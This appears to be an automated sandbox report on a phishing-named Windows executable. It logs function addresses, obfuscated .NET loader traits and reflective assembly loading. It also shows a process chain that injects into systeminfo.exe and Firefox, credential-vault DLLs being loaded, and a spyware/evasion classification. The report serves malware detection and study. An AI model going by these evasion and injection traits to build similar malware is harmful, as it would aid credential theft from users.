Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017D3FD2	2_2_017D3FD2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_01819EB0	2_2_01819EB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A2446	7_2_047A2446
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04794420	7_2_04794420
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0479E4F6	7_2_0479E4F6
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F0535	7_2_046F0535
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047B0591	7_2_047B0591
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0470C6E0	7_2_0470C6E0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F0770	7_2_046F0770
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04714750	7_2_04714750
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046EC7C0	7_2_046EC7C0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04782000	7_2_04782000
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04778158	7_2_04778158
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0478A118	7_2_0478A118
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046E0100	7_2_046E0100
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A81CC	7_2_047A81CC
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047B01AA	7_2_047B01AA
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A41A2	7_2_047A41A2
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04790274	7_2_04790274
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047702C0	7_2_047702C0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AA352	7_2_047AA352
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047B03E6	7_2_047B03E6
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046FE3F0	7_2_046FE3F0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F0C00	7_2_046F0C00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046E0CF2	7_2_046E0CF2
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04790CB5	7_2_04790CB5
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0478CD1F	7_2_0478CD1F
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046FAD00	7_2_046FAD00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046EADE0	7_2_046EADE0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04708DBF	7_2_04708DBF
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F0E59	7_2_046F0E59
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AEE26	7_2_047AEE26
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AEEDB	7_2_047AEEDB
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04702E90	7_2_04702E90
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047ACE93	7_2_047ACE93
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04764F40	7_2_04764F40
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04710F30	7_2_04710F30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04792F30	7_2_04792F30
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04732F28	7_2_04732F28
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046E2FC8	7_2_046E2FC8
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0476EFA0	7_2_0476EFA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F2840	7_2_046F2840
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046FA840	7_2_046FA840
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0471E8F0	7_2_0471E8F0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046D68B8	7_2_046D68B8
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04706962	7_2_04706962
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F29A0	7_2_046F29A0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047BA9A6	7_2_047BA9A6
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046EEA80	7_2_046EEA80
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AAB40	7_2_047AAB40
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A6BD7	7_2_047A6BD7
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046E1460	7_2_046E1460
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AF43F	7_2_047AF43F
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A7571	7_2_047A7571
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047B95C3	7_2_047B95C3
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0478D5B0	7_2_0478D5B0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04735630	7_2_04735630
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A16CC	7_2_047A16CC
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AF7B0	7_2_047AF7B0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A70E9	7_2_047A70E9
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AF0E0	7_2_047AF0E0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F70C0	7_2_046F70C0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0479F0CC	7_2_0479F0CC
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047BB16B	7_2_047BB16B
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0472516C	7_2_0472516C
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046DF172	7_2_046DF172
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046FB1B0	7_2_046FB1B0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0470D2F0	7_2_0470D2F0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047912ED	7_2_047912ED
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0470B2C0	7_2_0470B2C0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F52A0	7_2_046F52A0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046DD34C	7_2_046DD34C
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A132D	7_2_047A132D
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0473739A	7_2_0473739A
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04769C32	7_2_04769C32
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AFCF2	7_2_047AFCF2
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A7D73	7_2_047A7D73
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A1D5A	7_2_047A1D5A
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F3D40	7_2_046F3D40
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0470FDC0	7_2_0470FDC0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F9EB0	7_2_046F9EB0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AFF09	7_2_047AFF09
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046B3FD2	7_2_046B3FD2
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046B3FD5	7_2_046B3FD5
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AFFB1	7_2_047AFFB1
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F1F92	7_2_046F1F92
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0475D800	7_2_0475D800
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F38E0	7_2_046F38E0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0470B950	7_2_0470B950
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_046F9950	7_2_046F9950
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04785910	7_2_04785910
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04763A6C	7_2_04763A6C
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AFA49	7_2_047AFA49
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047A7A46	7_2_047A7A46
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0479DAC6	7_2_0479DAC6
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04735AA0	7_2_04735AA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0478DAAC	7_2_0478DAAC
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04791AA3	7_2_04791AA3
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_047AFB76	7_2_047AFB76
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04765BF0	7_2_04765BF0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0472DBF9	7_2_0472DBF9
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_0470FB80	7_2_0470FB80
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005C1CA0	7_2_005C1CA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005BCBF7	7_2_005BCBF7
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005BCC00	7_2_005BCC00
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005BCE20	7_2_005BCE20
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005BAEA0	7_2_005BAEA0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005C5300	7_2_005C5300
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005C34F9	7_2_005C34F9
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005C3540	7_2_005C3540
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005C353B	7_2_005C353B
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_005DB8D0	7_2_005DB8D0
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04A0E73C	7_2_04A0E73C
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04A0E284	7_2_04A0E284
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04A0E3A3	7_2_04A0E3A3
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: 7_2_04A0D808	7_2_04A0D808

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: String function: 0188F290 appears 103 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: String function: 01857E54 appears 107 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: String function: 017FB970 appears 262 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: String function: 0187EA12 appears 86 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: String function: 01845130 appears 58 times
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: String function: 04737E54 appears 107 times
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: String function: 0475EA12 appears 86 times
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: String function: 0476F290 appears 103 times
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: String function: 046DB970 appears 262 times
Source: C:\Windows\SysWOW64\systeminfo.exe	Code function: String function: 04725130 appears 58 times

Sample file is different than original file name gathered from version info

Source: Payment&WarantyBonds.exe, 00000000.00000002.1715237446.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1724504317.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000000.00000000.1655164569.000000000027C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.00000000013A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000018FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe	Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe

Uses 32bit PE files

Source: Payment&WarantyBonds.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payment&WarantyBonds.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, cILh9bHvx4dPN3VnUI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, cILh9bHvx4dPN3VnUI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, cILh9bHvx4dPN3VnUI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@15/14

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log

Source: unknown	Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.Payment&WarantyBonds.exe.3650b90.1.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.aff0000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.cs	.Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.50d0000.3.raw.unpack, Uo.cs	.Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007A4659 push edx; retf	0_2_007A465A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007A46C1 push ebx; retf	0_2_007A46C2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007A46BB push edx; retf	0_2_007A46BE
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007A46B9 push ebx; retf	0_2_007A46BA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007A4778 push esi; retf	0_2_007A477A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007A47AF push esi; retf	0_2_007A47B2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007AAC60 pushfd ; retf	0_2_007AAC62
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_007AAC58 pushfd ; retf	0_2_007AAC5A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 0_2_00C004E8 push esp; ret	0_2_00C004E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0040185B pushfd ; retf	2_2_0040187E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00426833 push edi; ret	2_2_0042683E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004148C0 push esp; retf	2_2_004148C1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004018BC pushad ; ret	2_2_004018D2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004031B0 push eax; ret	2_2_004031B2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004139BA pushfd ; ret	2_2_004139BB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0041AA77 push edx; iretd	2_2_0041AA86
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00418304 push eax; ret	2_2_00418305
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00417BD1 push esi; ret	2_2_00417BDA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0040D3BF push edx; ret	2_2_0040D3DA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00422562 push ss; retn 0000h	2_2_0042256A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00417E58 push ss; retf	2_2_00417E8D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0041A6CB push edi; retf	2_2_0041A6DC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_00401F0B pushfd ; retf	2_2_00401F0C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0041771B push esi; ret	2_2_0041771D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_0041473C push edi; retf	2_2_0041473E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_004117B1 push ss; iretd	2_2_004117C5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017D225F pushad ; ret	2_2_017D27F9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017D27FA pushad ; ret	2_2_017D27F9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_018009AD push ecx; mov dword ptr [esp], ecx	2_2_018009B6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017D283D push eax; iretd	2_2_017D2858
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe	Code function: 2_2_017D1366 push eax; iretd	2_2_017D1369

Source: 0.2.Payment&WarantyBonds.exe.41851b8.0.raw.unpack, HAAlopX3s3btnJ7UlG.cs	High entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
